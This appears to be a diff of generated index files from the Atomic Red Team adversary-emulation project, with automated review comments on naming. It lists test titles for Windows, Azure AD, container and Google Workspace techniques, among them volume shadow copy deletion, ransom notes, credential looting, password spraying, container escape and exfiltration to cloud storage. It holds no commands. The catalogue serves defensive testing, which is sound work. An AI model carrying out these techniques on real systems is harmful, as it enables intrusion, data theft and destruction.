1046 discovery T1518.001 Software Discovery: Security Software Discovery 5 Security Software Discovery - Sysmon Service fe613cf3-8009-4446-9a0f-bc78a15b66c9 command_prompt
1047 discovery T1518.001 Software Discovery: Security Software Discovery 6 Security Software Discovery - AV Discovery via WMI 1553252f-14ea-4d3b-8a08-d7a4211aa945 command_prompt
1048 discovery T1018 Remote System Discovery 1 Remote System Discovery - net 85321a9c-897f-4a60-9f20-29788e50bccd command_prompt
1049 discovery T1018 Remote System Discovery 2 Remote System Discovery - net group Domain Computers f1bf6c8f-9016-4edf-aff9-80b65f5d711f command_prompt
1050 discovery T1018 Remote System Discovery 3 Remote System Discovery - nltest 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 command_prompt
1051 discovery T1018 Remote System Discovery 4 Remote System Discovery - ping sweep 6db1f57f-d1d5-4223-8a66-55c9c65a9592 command_prompt
1052 discovery T1018 Remote System Discovery 5 Remote System Discovery - arp 2d5a61f5-0447-4be4-944a-1f8530ed6574 command_prompt
1053 discovery T1018 Remote System Discovery 8 Remote System Discovery - nslookup baa01aaa-5e13-45ec-8a0d-e46c93c9760f powershell
1054 discovery T1018 Remote System Discovery 9 Remote System Discovery - adidnsdump 95e19466-469e-4316-86d2-1dc401b5a959 command_prompt
1055 discovery T1018 Remote System Discovery 10 Adfind - Enumerate Active Directory Computer Objects a889f5be-2d54-4050-bd05-884578748bb4 command_prompt
1056 discovery T1018 Remote System Discovery 11 Adfind - Enumerate Active Directory Domain Controller Objects 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e command_prompt
1057 discovery T1018 Remote System Discovery 15 Enumerate domain computers within Active Directory using DirectorySearcher 962a6017-1c09-45a6-880b-adc9c57cb22e powershell
1058 discovery T1018 Remote System Discovery 16 Enumerate Active Directory Computers with Get-AdComputer 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf powershell
1059 discovery T1018 Remote System Discovery 17 Enumerate Active Directory Computers with ADSISearcher 64ede6ac-b57a-41c2-a7d1-32c6cd35397d powershell
1060 discovery T1018 Remote System Discovery 18 Get-DomainController with PowerView b9d2e8ca-5520-4737-8076-4f08913da2c4 powershell
1061 discovery T1018 Remote System Discovery 19 Get-WmiObject to Enumerate Domain Controllers e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad powershell
1062 discovery T1018 Remote System Discovery 20 Remote System Discovery - net group Domain Controller 5843529a-5056-4bc1-9c13-a311e2af4ca0 command_prompt
1063 discovery T1046 Network Service Discovery 3 Port Scan NMap for Windows d696a3cb-d7a8-4976-8eb5-5af4abf2e3df powershell
1064 discovery T1046 Network Service Discovery 4 Port Scan using python 6ca45b04-9f15-4424-b9d3-84a217285a5c powershell
1065 discovery T1046 Network Service Discovery 5 WinPwn - spoolvulnscan 54574908-f1de-4356-9021-8053dd57439a powershell
1066 discovery T1046 Network Service Discovery 6 WinPwn - MS17-10 97585b04-5be2-40e9-8c31-82157b8af2d6 powershell
1067 discovery T1046 Network Service Discovery 7 WinPwn - bluekeep 1cca5640-32a9-46e6-b8e0-fabbe2384a73 powershell
1068 discovery T1046 Network Service Discovery 8 WinPwn - fruit bb037826-cbe8-4a41-93ea-b94059d6bb98 powershell
1069 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
1070 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
1071 discovery T1518 Software Discovery 4 WinPwn - Dotnetsearch 7e79a1b6-519e-433c-ad55-3ff293667101 powershell
1072 discovery T1518 Software Discovery 5 WinPwn - DotNet 10ba02d0-ab76-4f80-940d-451633f24c5b powershell
1073 discovery T1518 Software Discovery 6 WinPwn - powerSQL 0bb64470-582a-4155-bde2-d6003a95ed34 powershell
1074 discovery T1124 System Time Discovery 1 System Time Discovery 20aba24b-e61f-4b26-b4ce-4784f763ca20 command_prompt
1075 discovery T1124 System Time Discovery 2 System Time Discovery - PowerShell 1d5711d6-655c-4a47-ae9c-6503c74fa877 powershell
1076 discovery T1124 System Time Discovery 4 System Time Discovery W32tm as a Delay d5d5a6b0-0f92-42d8-985d-47aafa2dd4db command_prompt
1077 discovery T1124 System Time Discovery 5 System Time with Windows time Command 53ead5db-7098-4111-bb3f-563be390e72e command_prompt
1078 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
1079 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
1080 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
1081 impact T1491.001 Defacement: Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
1082 impact T1491.001 Defacement: Internal Defacement 2 Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message ffcbfaab-c9ff-470b-928c-f086b326089b powershell
1083 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
1084 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
1085 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
1086 impact T1486 Data Encrypted for Impact 5 PureLocker Ransom Note 649349c7-9abf-493b-a7a2-b1aa4d141528 command_prompt
1087 impact T1486 Data Encrypted for Impact 8 Data Encrypted with GPG4Win 4541e2c2-33c8-44b1-be79-9161440f1718 powershell
1088 impact T1485 Data Destruction 1 Windows - Overwrite file with Sysinternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
1089 impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
1090 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
1091 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
1092 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
1093 impact T1490 Inhibit System Recovery 4 Windows - Disable Windows Recovery Console Repair cf21060a-80b3-4238-a595-22525de4ab81 command_prompt
1094 impact T1490 Inhibit System Recovery 5 Windows - Delete Volume Shadow Copies via WMI with PowerShell 39a295ca-7059-4a88-86f6-09556c1211e7 powershell
1095 impact T1490 Inhibit System Recovery 6 Windows - Delete Backup Files 6b1dbaf6-cc8a-4ea6-891f-6058569653bf command_prompt
1096 impact T1490 Inhibit System Recovery 7 Windows - wbadmin Delete systemstatebackup 584331dd-75bc-4c02-9e0b-17f5fd81c748 command_prompt
1097 impact T1490 Inhibit System Recovery 8 Windows - Disable the SR scheduled task 1c68c68d-83a4-4981-974e-8993055fa034 command_prompt
1098 impact T1490 Inhibit System Recovery 9 Disable System Restore Through Registry 66e647d1-8741-4e43-b7c1-334760c2047f command_prompt
1099 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
1100 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
1101 impact T1529 System Shutdown/Reboot 10 Logoff System - Windows 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 command_prompt
1102 initial-access T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
1103 initial-access T1566.001 Phishing: Spearphishing Attachment 1 Download Macro-Enabled Phishing Attachment 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
1104 initial-access T1566.001 Phishing: Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
1105 initial-access T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
1106 initial-access T1195 Supply Chain Compromise 1 Octopus Scanner Malware Open Source Supply Chain 82a9f001-94c5-495e-9ed5-f530dbded5e2 command_prompt
1107 initial-access T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
1108 initial-access T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
1109 initial-access T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
1110 initial-access T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
1111 initial-access T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
1112 exfiltration T1020 Automated Exfiltration 1 IcedID Botnet HTTP PUT 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 powershell
1113 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 1 Exfiltrate data HTTPS using curl windows 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 command_prompt
1114 exfiltration T1041 Exfiltration Over C2 Channel 1 C2 Data Exfiltration d1253f6e-c29b-49dc-b466-2147a6191932 powershell
1115 exfiltration T1048 Exfiltration Over Alternative Protocol 3 DNSExfiltration (doh) c943d285-ada3-45ca-b3aa-7cd6500c6a48 powershell
1116 exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage 1 Exfiltrate data with rclone to cloud Storage - Mega (Windows) 8529ee44-279a-4a19-80bf-b846a40dda58 powershell
1117 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 2 Exfiltration Over Alternative Protocol - ICMP dd4b4421-2e25-4593-90ae-7021947ad12e powershell
1118 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 4 Exfiltration Over Alternative Protocol - HTTP 6aa58451-1121-4490-a8e9-1dada3f1c68c powershell
1119 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 5 Exfiltration Over Alternative Protocol - SMTP ec3a835e-adca-4c7c-88d2-853b69c11bb9 powershell
1120 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 6 MAZE FTP Upload 57799bc2-ad1e-4130-a793-fb0c385130ba powershell
1121 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 7 Exfiltration Over Alternative Protocol - FTP - Rclone b854eb97-bf9b-45ab-a1b5-b94e4880c56b powershell
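Review bot: Sub-technique naming is inconsistent within this index hunk: the row `1113 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol` separates technique and sub-technique with ` - `, while the adjacent `T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol` rows and every other sub-technique row in the hunk (`T1087.002 Account Discovery: Domain Account`, `T1069.002 Permission Groups Discovery: Domain Groups`, ...) use `Technique: Sub-technique`; suggest normalising to `T1048.002 Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol` so consumers that split on the colon see the same shape for every sub-technique. The test name `Adfind -Listing password policy` (row 929) likewise lacks the space after the hyphen that all the other `Adfind - ...` test names in this hunk carry.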
@@ -1,98 +0,0 @@
# Azure AD Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1606.002 Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md)
- Atomic Test #1: Golden SAML [azure-ad]
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
- Atomic Test #7: Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) [azure-ad]
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.008 Impair Defenses: Disable Cloud Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
- Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
- [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #2: Azure AD - Create a new user [azure-ad]
- Atomic Test #3: Azure AD - Create a new user via Azure CLI [azure-ad]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #4: Azure AD - adding user to Azure AD role [azure-ad]
- Atomic Test #5: Azure AD - adding service principal to Azure AD role [azure-ad]
- Atomic Test #8: Azure AD - adding permission to application [azure-ad]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# execution
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1651 Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
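Review bot: this generated index offers "CONTRIBUTE A TEST" for an ATT&CK ID that no longer exists as a live technique: "T1108 Redundant Access [CONTRIBUTE A TEST]" appears under both defense-evasion and persistence in the azure-ad listing above. T1108 was deprecated by MITRE, so inviting a contribution against it produces a test that cannot be mapped to the current matrix. The generator should drop entries whose STIX object carries `revoked` or `x_mitre_deprecated` before emitting the tactic lists (the same filter would catch the other retired IDs further down this page). A smaller style point in the same region: sub-technique labels alternate between a parent-prefixed form ("T1078.001 Valid Accounts: Default Accounts", "T1562.008 Impair Defenses: Disable Cloud Logs") and a bare form ("T1556.007 Hybrid Identity", "T1098.005 Device Registration"); picking one form in the generator would make the index easier to scan and diff.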
@@ -1,89 +0,0 @@
# Containers Atomic Tests by ATT&CK Tactic & Technique
# discovery
- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
- Atomic Test #1: Container and ResourceDiscovery [containers]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #9: Network Service Discovery for Containers [containers]
# credential-access
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.007 Kubernetes List Secrets](../../T1552.007/T1552.007.md)
- Atomic Test #1: List All Secrets [containers]
- Atomic Test #2: ListSecrets [containers]
# persistence
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# execution
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1610 Deploy a container](../../T1610/T1610.md)
- Atomic Test #1: Deploy Docker container [containers]
- [T1609 Kubernetes Exec Into Container](../../T1609/T1609.md)
- Atomic Test #1: ExecIntoContainer [containers]
- Atomic Test #2: Docker Exec Into Container [containers]
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.003 User Execution: Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1611 Escape to Host](../../T1611/T1611.md)
- Atomic Test #1: Deploy container using nsenter container escape [containers]
- Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- T1036.005 Masquerading: Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1610 Deploy a container](../../T1610/T1610.md)
- Atomic Test #1: Deploy Docker container [containers]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1612 Build Image on Host](../../T1612/T1612.md)
- Atomic Test #1: Build Image On Host [containers]
- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
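Review bot: the technique headings in the containers listing above drift from the ATT&CK canonical names, which will confuse anyone cross-referencing the matrix: "T1609 Kubernetes Exec Into Container" is "Container Administration Command" in ATT&CK, "T1610 Deploy a container" is "Deploy Container", "T1552.007 Kubernetes List Secrets" is "Container API", and "T1053.007 Kubernetes Cronjob" is "Container Orchestration Job". These headings look like they are taken from each atomic's `display_name` rather than from the ATT&CK data used for the unlinked entries; taking the technique name from the ATT&CK source and reserving `display_name` for the per-test titles keeps the two consistent. Separately, several test titles are missing their word spacing ("Container and ResourceDiscovery", "ListSecrets", "ListCronjobs", "ExecIntoContainer"); these come straight from the yaml `name` fields, so the fix belongs in the atomics rather than the generator, and the validator could reject CamelCase-only names.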
@@ -1,101 +0,0 @@
# Google Workspace Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
